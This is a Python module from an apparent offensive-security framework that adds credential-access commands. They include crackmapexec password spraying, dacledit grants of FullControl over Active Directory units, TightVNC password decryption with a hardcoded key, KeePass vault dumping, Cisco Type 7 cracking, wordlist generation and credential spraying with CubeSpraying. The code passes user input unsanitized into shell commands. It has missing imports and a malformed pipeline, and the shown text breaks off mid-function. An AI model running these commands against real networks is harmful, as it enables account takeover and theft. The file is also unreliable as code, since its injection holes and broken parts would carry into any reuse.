"""cred commands migrated from lazyown.py.

Auto-generated by scripts/migrate_lazyown.py.
"""
from __future__ import annotations

import cmd2

import json
import os
import re
import subprocess
import time

from cli.commands._base import LazyOwnCommandSet
from utils import (
    CYAN,
    GREEN,
    MAGENTA,
    RESET,
    YELLOW,
    check_rhost,
    print_error,
    print_msg,
    print_warn,
)


class CredMigratedCommandSet(LazyOwnCommandSet):
    phase = "cred"
    category = "07. Credential Access"

    def _rotate_existing_credentials(self, credentials_file_path):
        """Back up an existing credentials file before it is overwritten.

        Args:
            credentials_file_path: Path to the active credentials file.

        Returns:
            The backup path when a rotation happened, otherwise ``None``.
        """
        if not os.path.exists(credentials_file_path):
            return None
        try:
            with open(credentials_file_path, "r") as fh:
                existing_credentials = fh.readline().strip()
        except (FileNotFoundError, OSError) as exc:
            print_warn(f"Could not read existing credentials file: {exc}{RESET}")
            return None
        existing_username = existing_credentials.split(":")[0].strip() or "previous"
        backup_file_path = f"sessions/credentials_{existing_username}.txt"
        try:
            os.rename(credentials_file_path, backup_file_path)
        except (FileNotFoundError, OSError) as exc:
            print_warn(f"Could not back up existing credentials file: {exc}{RESET}")
            return None
        print_msg(f"Existent file saved: {backup_file_path}{RESET}")
        return backup_file_path

    @cmd2.with_category("07. Credential Access")
    def do_createhash(self, line):
        """
        Creates a `hash.txt` file in the `sessions` directory with the specified hash value and analyzes it using `Name-the-hash`.

        This function performs the following actions:
        1. Validates the input line to ensure it is not empty.
        2. Backs up the existing `hash.txt` file if it exists, renaming it to `hash_{timestamp}.txt` based on the current timestamp.
        3. Writes the provided hash value to `sessions/hash.txt`.
        4. Analyzes the hash value using `Name-the-hash`.

        Usage:
            createhash <hash>

        :param line: The hash value to be written to `hash.txt` and analyzed.
        :type line: str
        :returns: None

        Manual execution:
        1. Creates or overwrites the file `sessions/hash.txt` with the specified hash value.
        2. Analyzes the hash value using the `nth` command.

        Dependencies:
        - `sessions/hash.txt` will be created in the `sessions` directory.
        - `Name-the-hash` must be installed and accessible via the command `nth`.

        Example:
            createhash 5f4dcc3b5aa765d61d8327deb882cf99

        Note:
            - Ensure the hash value is correct before running the analysis.
            - The hash value should be provided as a single argument without extra characters or spaces.
        """

        if not line.strip():
            print_error("Hash value cannot be empty.")
            return

        print_msg(f"Creating file sessions/hash.txt with content: {line}{RESET}")
        hash_file_path = 'sessions/hash.txt'
        if os.path.exists(hash_file_path):
            backup_file_path = f'sessions/hash_{int(time.time())}.txt'
            os.rename(hash_file_path, backup_file_path)
            print_msg(f"Archivo existente respaldado como {backup_file_path}{RESET}")

        with open(hash_file_path, 'w') as file:
            file.write(line + '\n')

        print_msg(f"Analizando sessions/hash.txt con Name-the-hash {RESET}")
        self.cmd(f"nth -t '{line}'")
        self.onecmd("create_session_json")

        return

    @cmd2.with_category("07. Credential Access")
    def do_createcredentials(self, line):
        """
        Creates a `credentials.txt` file in the `sessions` directory with the specified username and password.

        This function performs the following actions:
        1. Validates the input line to ensure it contains a colon (`:`), indicating the presence of both a username and password.
        2. Backs up the existing `credentials.txt` file if it exists, renaming it to `credentials_{username}.txt` based on the existing username.
        3. Writes the valid input to `sessions/credentials.txt`.

        Usage:
            createcredentials user:password

        :param line: The input line containing the username and password in the format `user:password`.
        :type line: str
        :returns: None

        Manual execution:
        1. Creates or overwrites the file `sessions/credentials.txt` with the specified username and password.

        Dependencies:
        - `sessions/credentials.txt` will be created in the `sessions` directory.

        Example:
            createcredentials administrator:passwordadministrator123&!

        Note:
            - Ensure the input format is correct: `user:password`.
            - The credentials should be properly formatted with a colon separating the username and password.
        """

        print_msg(
            f"Creating file{GREEN} sessions/credentials.txt with content: {YELLOW}{line}{RESET}"
        )

        credentials_file_path = 'sessions/credentials.txt'
        if ":" in line:
            self._rotate_existing_credentials(credentials_file_path)
            self.cmd(f"echo '{line}' > {credentials_file_path}")
        else:
            start_user = self.params['start_user']
            start_pass = self.params['start_pass']
            line = f"{self.params['start_user']}:{self.params['start_pass']}"
            self._rotate_existing_credentials(credentials_file_path)
            self.cmd(f"echo '{line}' > {credentials_file_path}")
        self.onecmd("create_session_json")
        return

    @cmd2.with_category("07. Credential Access")
    def do_cred(self, line):
        """
        Display the credentials stored in the `credentials.txt` file and copy the password to the clipboard.

        This function reads the stored credentials from a file named `credentials.txt` located in the `sessions` directory.
        The file should be in the format `username:password`. If the file does not exist, an error message will be printed
        instructing the user to create the credentials file first. The function extracts the username and password from the file,
        prints them, and copies the password to the clipboard using `xclip`.

        :param line: A string parameter that is not used in this function. It is included for compatibility with command-line
                    interface functions.

        :returns: None

        Manual execution:
        To manually perform the equivalent actions, follow these steps:

            1. Ensure the file `sessions/credentials.txt` exists and contains credentials in the format `username:password`.
            2. Read the file and extract the username and password.
            3. Print the username and password to the console.
            4. Use the `xclip` tool to copy the password to the clipboard. Example command:

                echo '<password>' | xclip -sel clip

        Example:
        If `sessions/credentials.txt` contains `admin:password123`, the function will print:

            User : admin
            Pass : password123

        The password `password123` will be copied to the clipboard.

        Note:
        Ensure `xclip` is installed on your system for copying to the clipboard. The function assumes that `xclip` is available
        and correctly configured.
        """
        path = os.getcwd()
        file = f"{path}/sessions/credentials.txt"
        if not os.path.exists(file):
            print_error("You need use createcredentials user:pass before.")
            return

        with open(file, "rb") as f:
            data = f.read()
        creds = data.split(b":")
        user = creds[0].decode('utf-8')
        passwd = creds[1].decode('utf-8').replace('\n','')
        print_msg(f"User : {user}")
        print_msg(f"Pass : {passwd}")
        copy2clip(passwd)
        return

    @cmd2.with_category("07. Credential Access")
    def do_searchhash(self, line):
        """
        Helps to find hash types in Hashcat by searching through its help output.

        1. Checks if an argument is provided:
        - If no argument is given, displays an error message indicating the need to pass a hash type.

        2. Executes a command to search for hash types:
        - Runs `hashcat -h` to display Hashcat help information and pipes it to `grep` to search for the provided argument.
        - Prints a message with the command being executed and provides further instructions for running Hashcat.

        3. Prints a message suggesting the next step:
        - Provides a suggestion for running Hashcat with the found hash types.

        :param line: The hash type or keyword to search for in the Hashcat help output.
        :type line: str
        :returns: None

        Manual execution:
        To manually run these tasks, you would need to:
        - Run `hashcat -h` to display the help information.
        - Use `grep` to search for the specific hash type or keyword within the help output.
        - Run Hashcat with the appropriate parameters based on the search results.

        Note: Ensure that `hashcat` is installed and accessible in the system's PATH.
        """
        if not line:
            print_error("you must pass the hash type to find by argument.")
            return

        print_msg(f"Try... hashcat -h | grep -i {line}{RESET}")
        self.cmd(f"hashcat -h | grep -i {line}")
        print_msg(f"now you can run : {MAGENTA} hashcat NNN sessions/hash.txt {RESET}")
        return

    @cmd2.with_category("07. Credential Access")
    def do_smalldic(self, list):
        """
        Handles the creation of temporary files for users and passwords based on a small dictionary.

        This function prompts the user to decide whether to use a small dictionary for generating
        user and password lists. If the user agrees, it loads the credentials from a JSON file and
        writes them into temporary files. If the user declines, the process is aborted.

        Parameters:
        list (str): Not used in this function, but kept for compatibility with cmd command input.

        Returns:
        None
        """
        use_small_dict = input(f"    {CYAN}[?] Do you want to use the small dictionary? (yes/no): ").strip().lower()

        if use_small_dict == "yes":
            path = os.getcwd()
            smalldic = f"{path}/modules/credentials.json"
            with open(smalldic) as f:
                data = json.load(f)

            print_msg("Create temporary files for users")
            with open('sessions/small_users.txt', 'w') as f:
                for username in data["usernames"]:
                    if username:
                        f.write(username + '\n')
            print_msg("Create temporary files for passwords")
            with open('sessions/small_passwords.txt', 'w') as f:
                for password in data["passwords"]:
                    if password:
                        f.write(password + '\n')
            print_msg("Done.")
        else:
            print_warn("Abort. smalldic")
        return

    @cmd2.with_category("07. Credential Access")
    def do_dacledit(self, line):
        """
        Execute the dacledit.py command for a specific user or all users listed in the users.txt file.

        This function interacts with the DACL editor to modify access control lists in an Active Directory environment.
        It allows the user to select a specific user from the list or execute the command for all users.
        Install impacket suit to get this script in the examples
        Args:
            line (str): The organizational unit (OU) in the format 'OU=EXAMPLE,DC=DOMAIN,DC=EXT'. If not provided, the user is prompted to enter it.

        Returns:
            None

        Workflow:
            1. Extract parameters and assign up paths.
            2. Check the reachability of the remote host.
            3. Prompt the user for an OU if not provided.
            4. Check if the users.txt file exists and read the list of users.
            5. Display the list of users and prompt the user to select a specific user.
            6. Execute the dacledit.py command for the selected user or all users.

        Raises:
            FileNotFoundError: If the users.txt file does not exist.

        Example:
            To execute the command for a specific user:
            >>> do_dacledit("MARKETING DIGITAL")

            To execute the command for all users:
            >>> do_dacledit("")
        """
        url = self.params['url']
        rhost = self.params['rhost']
        os.getcwd()
        users_txt = get_users_dic()
        domain = get_domain(url)
        ca = self.params['domain'].split(".") if self.params['domain'] else []
        base_domain = ca[0].upper() if len(ca) > 0 else ""
        ext = ca[1].upper() if len(ca) > 1 else ""
        if not check_rhost(self.params['rhost']):
            return
        if not line:
            line = input("    [!] Enter OU= example MARKETING DIGITAL: ")

        if not os.path.exists(users_txt):
            print_error(f"you need {users_txt} exec: sh nano sessions/users.txt, to create first attemp use cewl")
            return

        with open(users_txt) as file:
            users = [user.strip() for user in file]

        print_msg("Select a user by number to execute the command for a specific user, or press Enter to execute for all users:")
        for idx, user in enumerate(users, start=1):
            print_warn(f"{idx}. {user}")

        selection = input("Enter the number of the user you want to select: ").strip()

        if selection.isdigit():
            user = users[int(selection) - 1]
            command = command = f"export KRB5CCNAME=/tmp/{user}.ccache ; dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal '{user}' -target-dn 'OU={line},DC={base_domain},DC={ext}' '{self.params['domain']}/{user}' -k -no-pass -dc-ip {self.params['rhost']}"
            print_msg(command)
            self.cmd(command)
        else:
            for user in users:
                command = f"export KRB5CCNAME=/tmp/{user}.ccache ; dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal '{user}' -target-dn 'OU={line},DC={base_domain},DC={ext}' '{self.params['domain']}/{user}' -k -no-pass -dc-ip {self.params['rhost']}"
                print_msg(command)
                self.cmd(command)
        return

    @cmd2.with_category("07. Credential Access")
    def do_generatedic(self, line):
        """
        Generates a wordlist based on a target name and a list of characters, with various combinations.

        This function prompts the user for a target name and a wordlist name, then generates various combinations
        of the target name with a given list of characters. The combinations include single, double, triple, fourth,
        fifth, sixth, and intercalated character variations. The generated passwords are saved to the specified
        wordlist file.

        :param line: Not used in this function.

        :returns: None

        Manual execution:
        To manually generate a wordlist, run the script and follow the prompts to enter the target name,
        wordlist name, and additional characters if desired.

        For example:
            Enter target name(Ex. john) ::: john
            Enter wordlist name ::: my_wordlist.txt
            Char List ::: 1 2 3 4 5 6 7 8 9 0 ! @ # $
            Do you want to add more characters in char List[y/n] ::: y
            Enter characters by commas(Ex. : ^,&,*,) ::: ^,&,*
        """

        def single_combo(name, characters, file, total, flag):
            """
            Generates single character combinations with the target name.

            :param name: Target name to use in the combinations.
            :param characters: List of characters to combine with the target name.
            :param file: File object to write the combinations to.
            :param total: Running total of passwords generated.
            :param flag: If True, generate combinations with the target name at both the beginning and the end of the string.

            :returns: Updated total of passwords generated.
            """
            for char in characters:
                cpass1 = name + char
                if flag:
                    cpass2 = char + name
                    file.write(cpass1 + "\n" + cpass2 + "\n")
                    total += 2
                else:
                    file.write(cpass1 + "\n")
                    total += 1
            return total

        def double_combo(name, characters, file, total, flag):
            """
            Generates double character combinations with the target name.

            :param name: Target name to use in the combinations.
            :param characters: List of characters to combine with the target name.
            :param file: File object to write the combinations to.
            :param total: Running total of passwords generated.
            :param flag: If True, generate combinations with the target name at both the beginning and the end of the string.

            :returns: Updated total of passwords generated.
            """
            for char1 in characters:
                for char2 in characters:
                    cpass1 = name + char1 + char2
                    if flag:
                        cpass2 = char1 + char2 + name
                        file.write(cpass1 + "\n" + cpass2 + "\n")
                        total += 2
                    else:
                        file.write(cpass1 + "\n")
                        total += 1
            return total

        def triple_combo(name, characters, file, total, flag):
            """
            Generates triple character combinations with the target name.

            :param name: Target name to use in the combinations.
            :param characters: List of characters to combine with the target name.
            :param file: File object to write the combinations to.
            :param total: Running total of passwords generated.
            :param flag: If True, generate combinations with the target name at both the beginning and the end of the string.

            :returns: Updated total of passwords generated.
            """
            for char1 in characters:
                for char2 in characters:
                    for char3 in characters:
                        cpass1 = name + char1 + char2 + char3
                        if flag:
                            cpass2 = char1 + char2 + char3 + name
                            file.write(cpass1 + "\n" + cpass2 + "\n")
                            total += 2
                        else:
                            file.write(cpass1 + "\n")
                            total += 1
            return total

        def fourth_combo(name, characters, file, total, flag):
            """
            Generates fourth character combinations with the target name.

            :param name: Target name to use in the combinations.
            :param characters: List of characters to combine with the target name.
            :param file: File object to write the combinations to.
            :param total: Running total of passwords generated.
            :param flag: If True, generate combinations with the target name at both the beginning and the end of the string.

            :returns: Updated total of passwords generated.
            """
            for char1 in characters:
                for char2 in characters:
                    for char3 in characters:
                        for char4 in characters:
                            cpass1 = name + char1 + char2 + char3 + char4
                            if flag:
                                cpass2 = char1 + char2 + char3 + char4 + name
                                file.write(cpass1 + "\n" + cpass2 + "\n")
                                total += 2
                            else:
                                file.write(cpass1 + "\n")
                                total += 1
            return total

        def fifth_combo(name, characters, file, total, flag):
            """
            Generates fifth character combinations with the target name.

            :param name: Target name to use in the combinations.
            :param characters: List of characters to combine with the target name.
            :param file: File object to write the combinations to.
            :param total: Running total of passwords generated.
            :param flag: If True, generate combinations with the target name at both the beginning and the end of the string.

            :returns: Updated total of passwords generated.
            """
            for char1 in characters:
                for char2 in characters:
                    for char3 in characters:
                        for char4 in characters:
                            for char5 in characters:
                                cpass1 = name + char1 + char2 + char3 + char4 + char5
                                if flag:
                                    cpass2 = char1 + char2 + char3 + char4 + char5 + name
                                    file.write(cpass1 + "\n" + cpass2 + "\n")
                                    total += 2
                                else:
                                    file.write(cpass1 + "\n")
                                    total += 1
            return total

        def sixth_combo(name, characters, file, total, flag):
            """
            Generates sixth character combinations with the target name, adding uppercase characters.

            :param name: Target name to use in the combinations.
            :param characters: List of characters to combine with the target name.
            :param file: File object to write the combinations to.
            :param total: Running total of passwords generated.
            :param flag: If True, generate combinations with the target name at both the beginning and the end of the string.

            :returns: Updated total of passwords generated.
            """
            from itertools import product
            for combo in product(characters, repeat=6):
                combo_str = ''.join(combo)
                cpass1 = name + combo_str.upper()
                if flag:
                    cpass2 = combo_str.upper() + name
                    file.write(cpass1 + "\n" + cpass2 + "\n")
                    total += 2
                else:
                    file.write(cpass1 + "\n")
                    total += 1
            return total

        def intercalate_combo(name, characters, file, total, flag):
            """
            Generates combinations of the target name and character list, intercalating uppercase and lowercase characters.

            This function generates combinations where each character in the string alternates between uppercase and
            lowercase. It also allows for the addition of the target name at the beginning or the end of the string.

            :param name: Target name to use in the combinations.
            :param characters: List of characters to intercalate with the target name.
            :param file: File object to write the combinations to.
            :param total: Running total of passwords generated.
            :param flag: If True, generate combinations with the target name at both the beginning and the end of the string.

            :returns: Updated total of passwords generated.
            """

            def alternate_case(s):
                """Helper function to alternate the case of characters in a string."""
                return ''.join(c.lower() if i % 2 == 0 else c.upper() for i, c in enumerate(s))

            for combo in product(characters, repeat=6):
                combo_str = ''.join(combo)
                cpass1 = name + alternate_case(combo_str)
                if flag:
                    cpass2 = alternate_case(combo_str) + name
                    file.write(cpass1 + "\n" + cpass2 + "\n")
                    total += 2
                else:
                    file.write(cpass1 + "\n")
                    total += 1
            return total

        def expand_regex(regex):
            """
            Expands a regular expression into a list of characters.

            :param regex: Regular expression string to expand.
            :returns: List of characters matching the regular expression.
            """

            char_list = []
            if regex:
                if '[a-z]' in regex:
                    char_list.extend(list(string.ascii_lowercase))
                if '[A-Z]' in regex:
                    char_list.extend(list(string.ascii_uppercase))
                if '[0-9]' in regex:
                    char_list.extend(list(string.digits))
                if '[!@#$%^&*()]' in regex:
                    char_list.extend(list('!@#$%^&*()'))
            return char_list

        if not line:
            print_msg("Target name: ")
            target_name = input("    ╰─ ").strip()
        else:
            target_name = line

        wordlist_name = f"sessions/dic_{target_name}.txt"

        print_msg("Char List: ")
        char_list = input("    ╰─ ").strip().split()

        print_msg("Enter characters by commas(Ex. : ^,&,*,): ")
        more_chars = input("    ╰─ ").strip().split(',')
        char_list.extend(more_chars)

        print_msg("Do you want to add more characters in char List[y/n]: ")
        add_more = input("    ╰─ ").strip().lower()

        if add_more == 'y':
            print_msg("Enter a regex pattern to generate combinations (optional Ex. [a-z], [A-Z], [0-9] or [!@#$%^&*()]): ")
            regex_input = input("    ╰─ ").strip().split(',')
            if regex_input:
                char_list.extend(expand_regex(regex_input))
        total_passwords = 0
        print_warn("Generating dictionary... this might take a while, brew some coffee and come back to a freshly brewed wordlist.")
        with open(wordlist_name, 'w') as f:
            total_passwords = single_combo(target_name, char_list, f, total_passwords, True)
            total_passwords = double_combo(target_name, char_list, f, total_passwords, True)
            total_passwords = triple_combo(target_name, char_list, f, total_passwords, True)
            total_passwords = fourth_combo(target_name, char_list, f, total_passwords, True)
            total_passwords = fifth_combo(target_name, char_list, f, total_passwords, True)
            total_passwords = sixth_combo(target_name, char_list, f, total_passwords, True)
            total_passwords = intercalate_combo(target_name, char_list, f, total_passwords, True)

        print_msg(f"Wordlist {wordlist_name} generated with {total_passwords} passwords.")
        return

    @cmd2.with_category("07. Credential Access")
    def do_createmail(self, line):
        """
        Generate email permutations based on a full name and self.params['domain'], then save them to a file.

        This function prompts the user for a full name and self.params['domain'], generates various email
        permutations based on that information, and saves the results in a text file located
        in the `sessions` directory.

        Parameters:
        line (str): used as Fullname.

        Internal Variables:
        full_name (str): The full name entered by the user, defaulting to 'John Doe'.
        self.params['domain'] (str): The self.params['domain'] entered by the user, defaulting to 'example.com'.

        Returns:
        None

        Example Usage:
        - To generate emails using default values: `createmail`
        - To specify a full name and self.params['domain']: `createmail`

        Note:
        - The generated emails will be stored in a file named `emails_{full_name}_{self.params['domain']}.txt`
          within the `sessions` directory.
        """
        url = self.params['url']
        domain_def = get_domain(url)
        if not line:
            full_name = input("Enter full name (default: John Doe): ") or "John Doe"
        else:
            full_name = line

        domain = input("Enter self.params['domain'] (default: example.com): ") or domain_def
        print_error(self.params['domain'])
        emails = generate_emails(full_name, self.params['domain'])
        file_name = f"emails_{full_name.replace(' ', '_')}_{self.params['domain']}.txt"
        file_path = os.path.join("sessions", file_name)

        with open(file_path, 'w') as f:
            for email in emails:
                f.write(email + '\n')

        print_msg(f"Emails have been saved to {file_path}")
        self.cmd(f"cat {file_path}")
        return

    @cmd2.with_category("07. Credential Access")
    def do_passwordspray(self, line):
        """Perform password spraying using crackmapexec with the provided parameters.

        :param line: This parameter is not used in the function but can be reserved for future use.

        :returns: None

        Manual execution:
        To manually run `crackmapexec` for password spraying, use the following command:

            crackmapexec smb <IP Address> -u <users_file> -p <password> --continue-on-success

        This function prompts the user for IP address, user file, and password.
        """
        if not is_binary_present("crackmapexec"):
            print_warn("crackmapexec is not installed. Installing dependencies.")
            self.cmd("sudo apt install crackmapexec -y")
        rhost = self.params['rhost']
        print_msg("Gathering parameters for password spraying with crackmapexec...")

        ip_address = input("    [!] Enter the IP Address of your target: ").strip() or self.params['rhost']
        users_file = input("    [!] Enter the location of your users.txt file: ").strip() or "sessions/users.txt"
        password = input("    [!] Enter the password you want to spray at the users: ").strip()

        command = f"crackmapexec smb {ip_address} -u {users_file} -p '{password}' --continue-on-success"
        print_msg(f"Executing command: {command}")

        self.cmd(command)

        return

    @cmd2.with_category("07. Credential Access")
    def do_addusers(self, line):
        """
        Opens or creates the users.txt file in the sessions directory for editing using nano.

        :param line: Not used directly but reserved for future use.

        :returns: None
        """
        users_file_path = os.path.join("sessions", "users.txt")

        if not os.path.exists(users_file_path):
            print_warn(f"{users_file_path} does not exist. Creating the file.")
            os.makedirs(os.path.dirname(users_file_path), exist_ok=True)
            with open(users_file_path, 'w'):
                pass  # Create the file

        print_msg(f"Opening {users_file_path} with nano for editing.")
        self.cmd(f"nano {users_file_path} -l")

        return

    @cmd2.with_category("07. Credential Access")
    def do_passtightvnc(self, line):
        """
        Decrypts TightVNC passwords using Metasploit.

        This function demonstrates how TightVNC passwords can be decrypted using the known hardcoded DES key
        from the program and Metasploit's `Rex::Proto::RFB::Cipher.decrypt` function.

        Steps:
        - Receives the password in hexadecimal format from the command line input.
        - Creates a Metasploit resource script that includes commands to decrypt the TightVNC password.
        - Executes Metasploit with the created resource script and then deletes the temporary file.
        - Prints the decrypted password.

        :param line: The TightVNC password in hexadecimal format.
        :type line: str
        :returns: None

        Manual execution:
        To manually decrypt a TightVNC password, you would need to:
        - Use Metasploit's `Rex::Proto::RFB::Cipher.decrypt` function with the hardcoded DES key and the hexadecimal password.

        Example:
        passtightvnc D7A514D8C556AADE
        """

        if not line:
            print_warn("No password provided.")
            return

        hex_password = line.strip().upper()
        print_warn(hex_password)
        command = f"""
        key="\\x17\\x52\\x6b\\x06\\x23\\x4e\\x58\\x07"
        require 'rex/proto/rfb'
        Rex::Proto::RFB::Cipher.decrypt ["{hex_password}"].pack('H*'), key
        """.replace("        ", '')
        copy2clip(command)

        try:
            subprocess.run(["msfconsole", "-x", "irb -r"], check=True)
        except subprocess.CalledProcessError as e:
            print_error(f"Metasploit execution failed: {e}")

        print_msg("TightVNC password decryption completed.")
        return

    @cmd2.with_category("07. Credential Access")
    def do_transform(self, line):
        """
        Transforms the input string based on user-defined casing style.

        This command asks the user for a casing style (e.g., lower, upper, camel, pascal)
        and transforms the input string accordingly.

        Parameters:
            line (str): Input string to be transformed.
        """
        if not line:
            print_error("You need to pass the string as an argument, e.g., transform foo")
            return

        casing_input = input("    [?] Enter casing style (lower/l, upper/u, camel/c, pascal/p): ").strip().lower()
        if casing_input not in ['l', 'u', 'c', 'p']:
            print_warn("Invalid casing style. Choose from: l, u, c, p.")
            return

        delimiter = detect_delimiter(line)
        parts = handle(line)
        transformed_str = transform(parts, delimiter, casing_input)

        copy2clip(transformed_str)
        print_msg(f"Transformed string: {transformed_str}")
        return

    @cmd2.with_category("07. Credential Access")
    def do_username_anarchy(self, line):
        """
        Generate usernames using the username-anarchy tool based on user input.

        This function prompts the user to either provide names directly or select
        options such as auto-generation based on country datasets, input files, and
        specific username formats. It then constructs the command for `username-anarchy`
        and executes it.

        :param line: is optional you can pass the name and lastname as an argument example: username_anarchy firstname lastname
        :returns: None
        """
        path = os.getcwd()
        rhost = self.params['rhost']
        domain = self.params['domain']
        log = f"{path}/sessions/username_anarchy_{self.params['rhost']}.txt"
        command_base = f"{path}/external/.exploit/username_anarchy/username-anarchy"

        if not is_exist(command_base):
            print_warn("Username-anarchy not found. cloning...")
            self.cmd("git clone https://github.com/urbanadventurer/username-anarchy.git .exploit/username_anarchy")

        if line:
            name = line.replace(" ","")
            log = f"{path}/sessions/username_anarchy_{self.params['rhost']}_{name}.txt"
            cmd = f"{command_base} {line} > {log}"
            self.cmd(cmd)
            return

        auto_generate = input("    [!] Do you want to auto-generate usernames? (y/n): ").strip().lower() or 'n'

        if auto_generate == 'y':
            country = input("    [!] Enter the country for auto-generation [argentina, austria, belgium, canada, china, denmark, france, germany, hungary, india, ireland, italy, luxembourg, netherlands, newzealand, norway, poland, serbia, slovenia, spain, sweden, switzerland, uk, us, Facebook] (or leave blank for default): ").strip()
            if country:
                command = f"{command_base} --auto --country {country}"
            else:
                command = f"{command_base} --auto"
        else:
            input_file = input("    [!] Do you have an input file? (y/n): ").strip().lower() or 'y'
            if input_file == 'y':
                file_path = get_users_dic()
                command = f"{command_base} --input-file {file_path}"
            else:
                name_format = input("    [!] Enter names (e.g., first last): ").strip()
                command = f"{command_base} {name_format}"

            select_format = input("    [!] Do you want to specify a format plugin? (y/n): ").strip().lower() or 'y'
            if select_format == 'y':

                format_plugins = [
                    "first",
                    "firstlast",
                    "first.last",
                    "firstlast[8]",
                    "firstl",
                    "f.last",
                    "flast",
                    "lfirst",
                    "l.first",
                    "lastf",
                    "last",
                    "last.f",
                    "last.first",
                    "FLast",
                    "first1",
                    "fl",
                    "fmlast",
                    "firstmiddlelast",
                    "fml",
                    "FL",
                    "FirstLast",
                    "First.Last",
                    "Last"
                ]
                print_msg("Available username format plugins:")
                for i, plugin in enumerate(format_plugins):
                    print_msg(f"        {i+1}. {plugin}")

                plugin_choice = input("    [!] Choose one or more format plugins (e.g., 1,3,5): ").strip() or '1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23'
                try:

                    chosen_indices = [int(x) for x in plugin_choice.split(',') if x.isdigit() and 1 <= int(x) <= len(format_plugins)]
                    if chosen_indices:
                        selected_plugins = ",".join([format_plugins[i - 1] for i in chosen_indices])
                        command += f" --select-format {selected_plugins}"
                    else:
                        print_error("Invalid format selection.")
                        return
                except ValueError:
                    print_error("Invalid input format. Please provide valid numbers separated by commas.")
                    return

        command += f" > {log}"
        choice = input("    [!] Do you wanna add the Domain to dict. (y/n) ") or 'n'
        if choice == 'y':
            command += f" | | xargs -n 1 echo {self.params['domain']}\\ | tr -d ' ' > sessions/unames_{self.params['domain']}.txt"
        print_msg(f"    [!] Generated command: {command}")
        self.cmd(command)
        return

    @cmd2.with_category("07. Credential Access")
    def do_john2keepas(self, line):
        """
        List all .kdbx files in the 'sessions' directory, let the user select one, and run the
        command `sudo keepass2john {user_file} > sessions/hash.txt`.
        If 'sessions/hash.txt' already exists, it will be backed up with a timestamp to avoid overwriting.

        Parameters:
        line (str): An optional string parameter. This can be used for any additional input,
                    though it's not needed in this specific command.

        Returns:
        None
        """
        sessions_dir = 'sessions'
        kdbx_files = [f for f in os.listdir(sessions_dir) if f.endswith('.kdbx')]

        if not kdbx_files:
            print_error("No .kdbx files found in the 'sessions' directory.")
            return

        print_msg("Available .kdbx files:")
        for idx, file in enumerate(kdbx_files):
            print_msg(f"{idx}: {file}")

        try:
            file_index = int(input(f"    {GREEN}[!] Select the file number to use: "))
            selected_file = kdbx_files[file_index]
        except (IndexError, ValueError):
            print_error("Invalid selection.")
            return

        selected_file_path = os.path.join(sessions_dir, selected_file)

        hash_file_path = os.path.join(sessions_dir, 'hash.txt')
        if os.path.exists(hash_file_path):
            timestamp = time.strftime("%Y%m%d-%H%M%S")
            backup_hash_file = os.path.join(sessions_dir, f"hash_{timestamp}.txt")
            os.rename(hash_file_path, backup_hash_file)
            print_warn(f"Existing hash.txt file backed up as: {backup_hash_file}")
        command = f"sudo keepass2john {selected_file_path} > {hash_file_path}"
        try:
            print_msg(command)
            self.cmd(command)
            print_msg(f"Hash saved in: {hash_file_path}")
        except Exception as e:
            print_error(f"Error executing command: {str(e)}")
        return

    @cmd2.with_category("07. Credential Access")
    def do_keepass(self, line):
        """
        Open a .kdbx file and print the titles and contents of all entries. The password can be provided through
        the 'line' parameter, via user input, or from a 'credentials.txt' file in the 'sessions' directory.

        If the file 'credentials.txt' exists in the 'sessions' directory, the first password from it
        will be used automatically.

        Parameters:
        line (str): An optional string parameter to pass the password. If not provided, the user will
                    be prompted to input the password.

        Returns:
        None
        """
        sessions_dir = 'sessions'
        kdbx_files = [f for f in os.listdir(sessions_dir) if f.endswith('.kdbx')]

        if not kdbx_files:
            print_error("No .kdbx files found in the 'sessions' directory.")
            return

        print_msg("Available .kdbx files:")
        for idx, file in enumerate(kdbx_files):
            print_msg(f"{idx}: {file}")

        try:
            file_index = int(input(f"    {GREEN}[!] Select the file number to use: "))
            selected_file = kdbx_files[file_index]
        except (IndexError, ValueError):
            print_error("Invalid selection.")
            return

        selected_file_path = os.path.join(sessions_dir, selected_file)

        if os.path.exists(os.path.join(sessions_dir, 'credentials.txt')):
            credentials = get_credentials()
            if not credentials:
                return

            for user, passwd in credentials:
                password = passwd
        else:
            password = line if line else input(f"{GREEN}    [!] Enter the master password: ")

        try:
            from pykeepass import PyKeePass
            kp = PyKeePass(selected_file_path, password=password)

            print_msg(f"Entries in {selected_file}:")
            for entry in kp.entries:
                print_msg(f"Title: {entry.title}")
                print_msg(f"Username: {entry.username}")
                print_msg(f"Password: {entry.password}")
                print_msg(f"URL: {entry.url}")
                print_msg(f"Notes: {entry.notes}")
                print_msg("-" * 40)

        except Exception as e:
            print_error(f"Failed to open or process the file: {str(e)}")

        return

    @cmd2.with_category("07. Credential Access")
    def do_crack_cisco_7_password(self, line):
        """
        Crack a Cisco Type 7 password hash and display the plaintext.

        This command takes an encrypted Cisco Type 7 password hash as input,
        processes it to recover the original plaintext password, and prints the
        result to the console.

        Args:
            line (str): The encrypted password hash in Cisco Type 7 format.

        Returns:
            None: The function prints the plaintext password directly to the console.
        """
        crypttext = line.strip()
        plaintext = crack_password(crypttext)
        if plaintext:
            print_msg(f'[+] Plaintext: {plaintext}')
        else:
            print_warn('[-] Invalid input.')

    @cmd2.with_category("07. Credential Access")
    def do_cubespraying(self, line):
        """
        Command cubespraying: Automates the installation and usage of CubeSpraying for performing credential spraying attacks.

        This function performs the following tasks:
        1. Clones and installs CubeSpraying if not already installed.
        2. Prompts the user for the target URL, username file, password file, and optional parameters like verbosity and timeout.
        3. Executes CubeSpraying for credential spraying attacks against the target URL.

        Args:
            line (str): Optional argument for specifying the target URL, username file, password file, and additional CubeSpraying options.

        Returns:
            None

        Example:
            cubespraying --url http://example.com --usernames users.txt --passwords passwords.txt --verbose --timeout 5
        """

        cubespraying_repo = "https://github.com/robotshell/cubeSpraying.git"
        cubespraying_dir = os.path.join(os.getcwd(), "external/.exploit/cubeSpraying")
        url = self.params['url']
        wordlist = self.params['wordlist']
        if not os.path.exists(cubespraying_dir):
            print_msg("Cloning CubeSpraying repository...")
            self.cmd(f"git clone {cubespraying_repo} {cubespraying_dir}")
            print_msg("Installing required dependencies...")
            self.cmd("pip3 install requests")
        else:
            print_msg("CubeSpraying already installed, skipping setup.")
        print_msg("Choice the usernames diccionary")
        self.onecmd("smalldic")
        users = get_users_dic()
        password = get_users_dic()
        if not line:
            url = input(f"    [!] Enter the target URL (default {url} ): ").strip() or url
